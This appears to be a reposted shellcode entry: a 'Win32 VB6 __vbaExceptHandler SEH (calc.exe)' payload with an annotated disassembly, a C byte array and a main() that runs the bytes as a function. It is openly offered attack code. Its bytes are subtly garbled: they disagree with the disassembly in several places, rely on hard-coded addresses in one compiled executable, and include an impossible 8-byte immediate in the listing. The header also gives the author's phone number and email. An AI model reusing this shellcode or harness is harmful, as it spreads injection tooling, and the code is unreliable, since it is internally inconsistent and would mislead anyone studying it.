# =========[ Sh31LC0d3.C ]=====>
/*
###
# Title : Win32 VB6_vbaExceptHandler - SEH (calc.exe) ShellCode - 149 Bytes
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com | ked-h@exploit-id.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Twitter page : twitter.com/kedans
# platform : Win32
# Target : VB6 ExE Project >*> Command : Shell ("calc.exe")
# Tested on : Windows XP SP3 France
###
*/
// TesT Project >> Compile As Name k3d4n5.exe <<
/*
004018E0 > 55 | PUSH EBP
004018E1 . 8BEC | MOV EBP,ESP
004018E3 . 83EC 0C | SUB ESP,0C
004018E6 . 68 96104000 | PUSH <JMP.&MSVBVM60.__vbaExceptHandler> ; SE handler installation (SEH)
004018EB . 64:A1 00000000 | MOV EAX,DWORD PTR FS:[0]
004018F1 . 50 | PUSH EAX
004018F2 . 64:8925 00000000 | MOV DWORD PTR FS:[0],ESP
004018F9 . 83EC 30 | SUB ESP,30
004018FC . 53 | PUSH EBX
004018FD . 56 | PUSH ESI
004018FE . 57 | PUSH EDI
004018FF . 8965 F4 | MOV DWORD PTR SS:[EBP-C],ESP
00401902 . C745 F8 80104000 | MOV DWORD PTR SS:[EBP-8],k3d4n5.00401080
00401909 . 8B45 08 | MOV EAX,DWORD PTR SS:[EBP+8]
0040190C . 8BC8 | MOV ECX,EAX
0040190E . 83E1 01 | AND ECX,1
00401911 . 894D FC | MOV DWORD PTR SS:[EBP-4],ECX
00401914 . 24 FE | AND AL,0FE
00401916 . 50 | PUSH EAX
00401917 . 8945 08 | MOV DWORD PTR SS:[EBP+8],EAX
0040191A . 8B10 | MOV EDX,DWORD PTR DS:[EAX]
0040191C . FF52 04 | CALL DWORD PTR DS:[EDX+4]
0040191F . 33F6 | XOR ESI,ESI
00401921 . 8D55 CC | LEA EDX,DWORD PTR SS:[EBP-34]
00401924 . 8975 CC | MOV DWORD PTR SS:[EBP-34],ESI
00401927 . 8D4D DC | LEA ECX,DWORD PTR SS:[EBP-24]
0040192A . 8975 DC | MOV DWORD PTR SS:[EBP-24],ESI
0040192D . C745 D4 616C632E657865 | MOV DWORD PTR SS:[EBP-2C], calc.exe
00401934 . C745 CC 08000000 | MOV DWORD PTR SS:[EBP-34],8
0040193B . FF15 68104000 | CALL DWORD PTR DS:[<&MSVBVM60.__vbaVarDup>] ; MSVBVM60.__vbaVarDup
00401941 . 8D45 DC | LEA EAX,DWORD PTR SS:[EBP-24]
00401944 . 6A 02 | PUSH 2
00401946 . 50 | PUSH EAX
00401947 . FF15 34104000 | CALL DWORD PTR DS:[<&MSVBVM60.#600>] ; MSVBVM60.rtcShell
0040194D . 8D4D DC | LEA ECX,DWORD PTR SS:[EBP-24]
00401950 . DDD8 | FSTP ST
00401952 . FF15 08104000 | CALL DWORD PTR DS:[<&MSVBVM60.__vbaFreeVar>] ; MSVBVM60.__vbaFreeVar
00401958 . 8975 FC | MOV DWORD PTR SS:[EBP-4],ESI
0040195B . 9B | WAIT
0040195C . 68 6E194000 | PUSH k3d4n5.0040196E
00401961 . EB 0A | JMP SHORT k3d4n5.0040196D
00401963 . 8D4D DC | LEA ECX,DWORD PTR SS:[EBP-24]
00401966 . FF15 08104000 | CALL DWORD PTR DS:[<&MSVBVM60.__vbaFreeVar>] ; MSVBVM60.__vbaFreeVar
0040196C . C3 | RETN
*/
char SEH[] =
"\x55\x8B\xEC\x83\xEC\x0C\x68\x96\x10\x40\x00\x64\xA1\x00\x00\x00\x00\x50\x64"
"\x89\x25\x00\x00\x00\x00\x00\x40\x18\xF9\x83\xEC\x30\x53\x56\x57\x89\x65\xF4"
"\xC7\x45\xF8\x80\x10\x40\x00\x8B\x45\x08\x8B\xC8\x83\xE1\x01\x89\x4D\xFC\x24"
"\xFE\x50\x89\x45\x08\x8B\x10\xFF\x52\x04\x33\xF6\x8D\x55\xCC\x89\x75\xCC\x8D"
"\x4D\xDC\x89\x75\xDC\xC7\x45\xD4\x61\x6C\x63\x2E\x65\x78\x65\xC7\x45\xCC\x08"
"\x00\x00\x00\xFF\x15\x68\x10\x40\x00\x8D\x45\xDC\x6A\x02\x50\xFF\x15\x34\x10"
"\x00\x8D\x4D\xDC\xDD\xD8\xFF\x15\x08\x10\x40\x00\x89\x75\xFC\x9B\x68\x41\x42"
"\x43\x40\x44\xEB\x0A\x8D\x4D\xDC\xFF\x15\x08\x10\x40\x00\xC3";
int main(int argc, char **argv)
{
int (*shellcode)();
shellcode = (int (*)()) SEH;
(int)(*shellcode)();
}
/*
No comments:
Post a Comment